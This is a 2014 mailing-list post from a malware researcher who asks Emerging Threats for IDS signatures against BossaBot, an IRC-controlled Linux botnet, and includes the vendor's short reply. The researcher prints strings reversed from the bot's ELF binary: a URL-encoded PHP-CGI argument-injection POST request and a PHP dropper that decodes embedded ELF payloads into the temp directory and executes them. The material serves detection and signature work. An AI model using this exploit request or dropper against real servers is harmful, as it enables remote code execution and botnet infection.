[Emerging-Sigs] Request #3 - ET Signature for Linux Bossabot

Will Metcalf wmetcalf at emergingthreatspro.com
Sun Sep 21 22:02:15 EDT 2014


We will look into everything you sent us today and try to have something out tomorrow for anything that isn't already covered. Thanks again!



> On Sep 21, 2014, at 8:09 PM, Hendrik Adrian <1 at 1rik.com> wrote:
> Hello Will,
> CC: ..and ET friends,
> There is one more request. A route of Kaiten base code DDoS'er, was recoded into an active evil botnet (IRC base), the actor called it as BossaBot. Assisting Mr. Malekal Morte I am in charge to reversing the ELF binaries, since 1st time the RFI attack spotted and botnet was spotted in some forum.
> These are good chronological reference of the threat:
> Malekal's report: http://www.malekal.com/2014/08/26/bossabotv2-another-linux-backdoor-irc/
> My reversing in monitoring this ELF threat: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965
> Spiderlabs posted about this threat too: http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
> ...according to posts above you will see that the threat is important to handle.
> If ET sig doesn't cover this threat yet..I would like to request the ET sig to block this RFI and the PHP infection (or "injection" is more like it). If you think you have, please see the below details, in case anything can be improved.
> The problem of this proposal is, since the botnet attack request can only be activated from the actor's IRC, it is a bit difficult to simulate the attack to make a good capture PCAP (I tried many times), so there is no PCAP. But we have THREE information that can be used to replace the PCAP to generate sigs, as per follows:
> (1) RFI and web file injection HTTP header injected log.
> The log is available in here: http://pastebin.com/raw.php?i=KUTT2UQa < @undeadsecurity was doing a good work in recording this (a credit)
> (2) The latest ELF binary I reversed, was spotted 2 days ago, contains the below data hard coded in the bins:
> .rodata:0x0408540 aPostS?2d64616c 
> .rodata:0x0408540   db 'POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E'
> .rodata:0x0408540   db '%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6'
> .rodata:0x0408540   db 'D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%'
> .rodata:0x0408540   db '6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%'
> .rodata:0x0408540   db '64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%'
> .rodata:0x0408540   db '6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%'
> .rodata:0x0408540   db '%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70'
> .rodata:0x0408540   db '%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%'
> .rodata:0x0408540   db '%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72'
> .rodata:0x0408540   db '%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%6'
> .rodata:0x0408540   db '3%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74'
> .rodata:0x0408540   db '%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%6'
> .rodata:0x0408540   db '7%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31'
> .rodata:0x0408540   db '+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%6'
> .rodata:0x0408540   db '6%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2'
> .rodata:0x0408540   db 'D%%6E HTTP/1.1',0Dh,0Ah
> .rodata:0x0408540   db 'Host: %s',0Dh,0Ah
> .rodata:0x0408540   db 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 '
> .rodata:0x0408540   db 'Firefox/31.0',0Dh,0Ah
> .rodata:0x0408540   db 'Content-Type: application/x-www-form-urlencoded',0Dh,0Ah
> .rodata:0x0408540   db 'Content-Length: %d',0Dh,0Ah
> .rodata:0x0408540   db 'Connection: close',0Dh,0Ah
> .rodata:0x0408540   db 0Dh,0Ah
> .rodata:0x0408540   db '%s',0
> .rodata:0x04089D5   align 8
>    :
> .rodata:0x04089D8 a?phpBufferfSBu 
> .rodata:0x04089D8   db '<?php',0Ah          ;
> .rodata:0x04089D8   db '$bufferf = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8   db '$bufferf2 = ',27h,'%s',27h,';',0Ah
> .rodata:0x04089D8   db '$Vdkqrxiiyr3t = sys_get_temp_dir();',0Ah
> .rodata:0x04089D8   db '$Vgxl4ifsipo5 = getcwd();',0Ah
> .rodata:0x04089D8   db '$Vos03apkyec1 = "OIOIU74u";',0Ah
> .rodata:0x04089D8   db '$Vos03apkyec2 = "OIOIU74ux";',0Ah
> .rodata:0x04089D8   db '$V5lgt4awdv3b = "chmod 777";',0Ah
> .rodata:0x04089D8   db 'if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))',0Ah
> .rodata:0x04089D8   db '{',0Ah
> .rodata:0x04089D8   db 'exit(1);',0Ah
> .rodata:0x04089D8   db '}else{',0Ah
> .rodata:0x04089D8   db 'echo($Vdkqrxiiyr3t);',0Ah
> .rodata:0x04089D8   db '$bufferf = base64_decode($bufferf);',0Ah
> .rodata:0x04089D8   db '$bufferf2 = base64_decode($bufferf2);',0Ah
> .rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);',0Ah
> .rodata:0x04089D8   db 'file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);',0Ah
> .rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);',0Ah
> .rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8   db 'chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);',0Ah
> .rodata:0x04089D8   db 'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");',0Ah
> .rodata:0x04089D8   db 'system($Vdkqrxiiyr3t . "/$Vos03apkyec1");',0Ah
> .rodata:0x04089D8   db 'exit(1);',0Ah
> .rodata:0x04089D8   db '}',0Ah
> .rodata:0x04089D8   db '?>',0Ah,0
> .rodata:0x0408CE9   align 10h
> Using the above (1) and (2) we can use the hard coded HTTP HEADER to be blocked by ET Sigs.
> Moreover, there is one more vector to use as filtration (below):
> (3) The injected ELF file to the /tmp directory
> <?php
> $bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
> $bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';
> ↑the above "$bufferf ="and "$buffer2 =" looks like a good spot to filter. But only new version is using this, old version is using different scheme (without PHP injection but PHP system command to wget the bins..)
> If you need more confirmation, please do not hesitate to ask.
> It will be nice if this threat also can be blocked.
> Herewith I close the series of requests for ET sigs from MalwareMustDie, total 3 DDoS botnets signature. Look forward for the reply with thank you in advance.
> Best regards always/Rick
> -- 
> Hendrik Adrian / @unixfreaxjp
> PGP/MIT.EDU: RSA 2048/0xEC61AB9
> http://about.me/unixfreaxjp
> MalwareMustDie,NPO Research Group
> Web http://malwaremustdie.org
> Research blog: http://malwaremustdie.blogspot.com
> Wiki & Code: http://code.google.com/p/malwaremustdie/
> Report Pastes: http://pastebin.com/u/MalwareMustDie
> This email is confidential and may be legally privileged. It is intended
> as a confidential communication only for the person(s) named above.
> Any other use or disclosure is prohibited.
> If you have received this message in error, please delete it, disregard its contents.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20140921/be14b921/attachment-0001.html>

More information about the Emerging-sigs mailing list